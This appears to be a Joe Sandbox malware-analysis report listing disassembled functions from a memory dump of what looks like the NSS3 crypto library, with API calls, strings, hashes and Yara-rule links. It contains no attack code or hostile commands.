String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 7a114026a90c9ac8529f844fd8d1cd7c0e62b65a92d439932d493990b6a6514b
Instruction ID: 95f8ac578143aae3a8c56c674cb65f30bd7cd41e4cf1ab156f75cecc2ce86dc7
Opcode Fuzzy Hash: 7a114026a90c9ac8529f844fd8d1cd7c0e62b65a92d439932d493990b6a6514b
Instruction Fuzzy Hash: 6F5191B1E142499BDF009BE5DD46ABE77FCAF01348F080529EA169BA40E770E588CB91

Function 6CB76E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA2CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA8F9C9,?,6CA8F4DA,6CA8F9C9,?,?,6CA5369A), ref: 6CA2CA7A
Part of subcall function 6CA2CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA2CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CA3BE66), ref: 6CB76E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CA3BE66), ref: 6CB76E98
sqlite3_snprintf.NSS3(?,00000000,6CBDAAF9,?,?,?,?,?,?,6CA3BE66), ref: 6CB76EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CA3BE66), ref: 6CB76ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CA3BE66), ref: 6CB76EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB76F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB76F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB76F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CA3BE66), ref: 6CB76FA6
sqlite3_snprintf.NSS3(?,00000000,6CBDAAF9,00000000,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB76FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB76FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB76FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB77014
sqlite3_free.NSS3(00000000,?,?,?,?,6CA3BE66), ref: 6CB7701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CA3BE66), ref: 6CB77030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB7705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CA3BE66), ref: 6CB77079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB77097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CA3BE66), ref: 6CB770A0

Strings

mz_etilqs_, xrefs: 6CB76F18
winGetTempname1, xrefs: 6CB7708F
winGetTempname4, xrefs: 6CB77046
winGetTempname2, xrefs: 6CB770C4
winGetTempname5, xrefs: 6CB77071

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 4a49571f8285c8996e22f4788763c0b5d8e205af30678c607ffe50e4557e55c8
Instruction ID: c9b451a64dc869de680a5aa801bc814272118cb94770d9a24a04fed6e5788a13
Opcode Fuzzy Hash: 4a49571f8285c8996e22f4788763c0b5d8e205af30678c607ffe50e4557e55c8
Instruction Fuzzy Hash: 76516C71A042A11BE72156309C55BBF366ACB92758F184538EC25A7BC1FF25950E83F3

Function 6CB04FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000,00000000,00000001), ref: 6CB05009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2,00000000), ref: 6CB05049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB0505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CB05071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB05089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB050A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CB050B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAB75C2), ref: 6CB050CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB050D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB050F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB05103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB05145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB05153
free.MOZGLUE(?), ref: 6CB0516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB0517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB05195

Strings

nss=, xrefs: 6CB05083
library=, xrefs: 6CB05043
config=, xrefs: 6CB0509B
name=, xrefs: 6CB05057
parameters=, xrefs: 6CB0506B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: f7ccf1c271f5bf1de612d093062034b6258df1c90d0dcfa74fc7166b887a4248
Instruction ID: 364441bf49d441eced24c3f403ff888a82be09be46a3fa1ab23bbcbd4df3d900
Opcode Fuzzy Hash: f7ccf1c271f5bf1de612d093062034b6258df1c90d0dcfa74fc7166b887a4248
Instruction Fuzzy Hash: A55187B5B412455BEB11DF24DC45AEE3BA8AF06248F140020EC59E7F42F735E919CBBA

Function 6CAD8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6CAD8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD8EB3

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAD8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CAD8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD8F29
PR_LogPrint.NSS3(?,00000000), ref: 6CAD8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CAD8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD8F80
PR_LogPrint.NSS3(?,00000000), ref: 6CAD8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CAD8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CAD8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CAD9047

Strings

pMechanism = 0x%p, xrefs: 6CAD8EE0
pulWrappedKeyLen = 0x%p, xrefs: 6CAD8FC8
pWrappedKey = 0x%p, xrefs: 6CAD8FAD
hKey = 0x%x, xrefs: 6CAD8F5B, 6CAD8F6B
*pulWrappedKeyLen = 0x%x, xrefs: 6CAD9042
hSession = 0x%x, xrefs: 6CAD8E8E, 6CAD8E9E
(CK_INVALID_HANDLE), xrefs: 6CAD8EAC, 6CAD8F1F, 6CAD8F79
C_WrapKey, xrefs: 6CAD8E71
hWrappingKey = 0x%x, xrefs: 6CAD8F01, 6CAD8F11

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: 6c558cfba46b57aace2cdddc38aa6fbcfcf2c9af03b95a93d8aa58e0243067e1
Instruction ID: 9578e9ed4857b12e9c459036106bac51e7efc76e6b3235909ed625f2875ef326
Opcode Fuzzy Hash: 6c558cfba46b57aace2cdddc38aa6fbcfcf2c9af03b95a93d8aa58e0243067e1
Instruction Fuzzy Hash: 4251C575701185ABDB009F14EE48FAE7776EB4631DF0A4029F508B7A12DB35ED48CB92

Function 6CB04C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CAF4F51,00000000), ref: 6CB04C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAF4F51,00000000), ref: 6CB04C5B
PR_smprintf.NSS3(6CBDAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CAF4F51,00000000), ref: 6CB04C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CAF4F51,00000000), ref: 6CB04CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB04CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB04CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB04D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAF4F51,00000000), ref: 6CB04D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAF4F51,00000000), ref: 6CB04D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CB04D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CB04DA2
free.MOZGLUE(?), ref: 6CB04DB9
free.MOZGLUE(00000000), ref: 6CB04DCF

Strings

0x%08lx=[%s %s], xrefs: 6CB04D80
rootFlags, xrefs: 6CB04D47
ootT, xrefs: 6CB04D1A
slotFlags, xrefs: 6CB04D34
%s,%s, xrefs: 6CB04C4B
any, xrefs: 6CB04C96
rust, xrefs: 6CB04D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CB04D9D
every, xrefs: 6CB04CA1
timeout, xrefs: 6CB04C91

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: e5ccd1894d1889971c6c000bf825568a82f528c86d89dabe7409fc9c8bd65353
Instruction ID: d5fde9103b8dbb1989a75a337a42ce0a79d0ac87a4f72c8ace3f9eca0128c813
Opcode Fuzzy Hash: e5ccd1894d1889971c6c000bf825568a82f528c86d89dabe7409fc9c8bd65353
Instruction Fuzzy Hash: B4416BB1A001D16BDB116F14AC44ABF3E65EFA235CF094228E8195BB01E731E968CBD3

Function 6CAADDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CAADDDE

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CAADDF5

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CAADE34
PR_Now.NSS3 ref: 6CAADE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CAADE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAADEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAADEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAADED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6CAADEF0
PR_smprintf.NSS3(6CBDAAF9,(NULL) (Validity Unknown)), ref: 6CAADF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAADF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAADF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CAADF33
free.MOZGLUE(00000000), ref: 6CAADF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAADF4B
free.MOZGLUE(00000000), ref: 6CAADF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAADF8E

Strings

%s%s, xrefs: 6CAADEEB
{???}, xrefs: 6CAADE8B
(NULL) (Validity Unknown), xrefs: 6CAADEFA

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 63b27ce160a4d0f08fa9172687265ea5b427a7228d64853528e8447003d85fea
Instruction ID: 172be5b80a581968aec101855043cd8880ced0add414942c58a9003bd6de0a9e
Opcode Fuzzy Hash: 63b27ce160a4d0f08fa9172687265ea5b427a7228d64853528e8447003d85fea
Instruction Fuzzy Hash: 2351B3B1E001419BDB109FA59C41ABF7AB8EF99358F184029EC59E7B00E731D955CBE1

Function 6CAE2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CAE2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CAE2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAE2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAE2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CAB4F1C,?,-00000001,00000000,?), ref: 6CAE2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CAB4F1C,?,-00000001,00000000), ref: 6CAE2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAE2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAE2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAE2EF8
PR_Unlock.NSS3(?), ref: 6CAE2F62
TlsGetValue.KERNEL32 ref: 6CAE2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CAE2F9E
PR_Unlock.NSS3(?), ref: 6CAE2FCA
TlsGetValue.KERNEL32 ref: 6CAE301A
EnterCriticalSection.KERNEL32(?), ref: 6CAE302E
PR_Unlock.NSS3(?), ref: 6CAE3066
PR_SetError.NSS3(00000000,00000000), ref: 6CAE3085
PR_Unlock.NSS3(?), ref: 6CAE30EC
TlsGetValue.KERNEL32 ref: 6CAE310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CAE3124
PR_Unlock.NSS3(?), ref: 6CAE314C

Part of subcall function 6CAC9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CAF379E,?,6CAC9568,00000000,?,6CAF379E,?,00000001,?), ref: 6CAC918D
Part of subcall function 6CAC9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CAF379E,?,6CAC9568,00000000,?,6CAF379E,?,00000001,?), ref: 6CAC91A0

Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907AD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907CD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907D6
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA2204A), ref: 6CA907E4
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,6CA2204A), ref: 6CA90864
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA90880
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,6CA2204A), ref: 6CA908CB
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908D7
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908FB

PR_SetError.NSS3(00000000,00000000), ref: 6CAE316D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 221665093c645db504ac31310cedf4840db10d5f5dcc14176ef514e2e7eec08c
Instruction ID: aea92ece7e7b20634d5ede615b1e41bb59b53a30b30f2dd37f3793af9c47c523
Opcode Fuzzy Hash: 221665093c645db504ac31310cedf4840db10d5f5dcc14176ef514e2e7eec08c
Instruction Fuzzy Hash: 5CF17AB5E002199FDF00DF68D884B9EBBB4BF09318F184169E855A7721EB31A995CBC1

Function 6CADAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6CADAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CADAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CADAF83

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CADAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CADAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CADAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CADAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CADB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CADB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6CADB041

Strings

pParameter = 0x%p, xrefs: 6CADAFB9
pData = 0x%p, xrefs: 6CADAFEF
ulDataLen = %d, xrefs: 6CADB00A
C_SignMessage, xrefs: 6CADAF41
pSignature = 0x%p, xrefs: 6CADB023
pulSignatureLen = 0x%p, xrefs: 6CADB03C
ulParameterLen = 0x%p, xrefs: 6CADAFD4
hSession = 0x%x, xrefs: 6CADAF5E, 6CADAF6E
(CK_INVALID_HANDLE), xrefs: 6CADAF7C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 8627ae623c98f761f7890345bb4da158862c7dbe5c032194c44ed7c022f657a5
Instruction ID: 7310496242b97729771ad256b5d076ba85166fb5107e0cc9e512c29a323c35c8
Opcode Fuzzy Hash: 8627ae623c98f761f7890345bb4da158862c7dbe5c032194c44ed7c022f657a5
Instruction Fuzzy Hash: 5C41D775701185AFDB008F54EE48EDD77B2EB4631DF4A4068F508A7612DB31DC98CBA2

Function 6CAC9FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CAC9FBE

Part of subcall function 6CAA2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CAA2F0A
Part of subcall function 6CAA2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAA2F1D

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CACA015

Part of subcall function 6CAE1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6CAE563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6CAE195C
Part of subcall function 6CAE1940: EnterCriticalSection.KERNEL32(?,?,6CAE563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6CABEAC5,00000001), ref: 6CAE1970
Part of subcall function 6CAE1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6CABEAC5,00000001,?,6CABCE9B,00000001,6CABEAC5), ref: 6CAE19A0

PL_FreeArenaPool.NSS3(?), ref: 6CACA067
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CACA055

Part of subcall function 6CA24C70: TlsGetValue.KERNEL32(?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24C97
Part of subcall function 6CA24C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CB0
Part of subcall function 6CA24C70: PR_Unlock.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CC9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACA07E
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CACA0B1
PL_FreeArenaPool.NSS3(?), ref: 6CACA0C7
PL_FinishArenaPool.NSS3(?), ref: 6CACA0CF
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CACA12E
PL_FreeArenaPool.NSS3(?), ref: 6CACA140
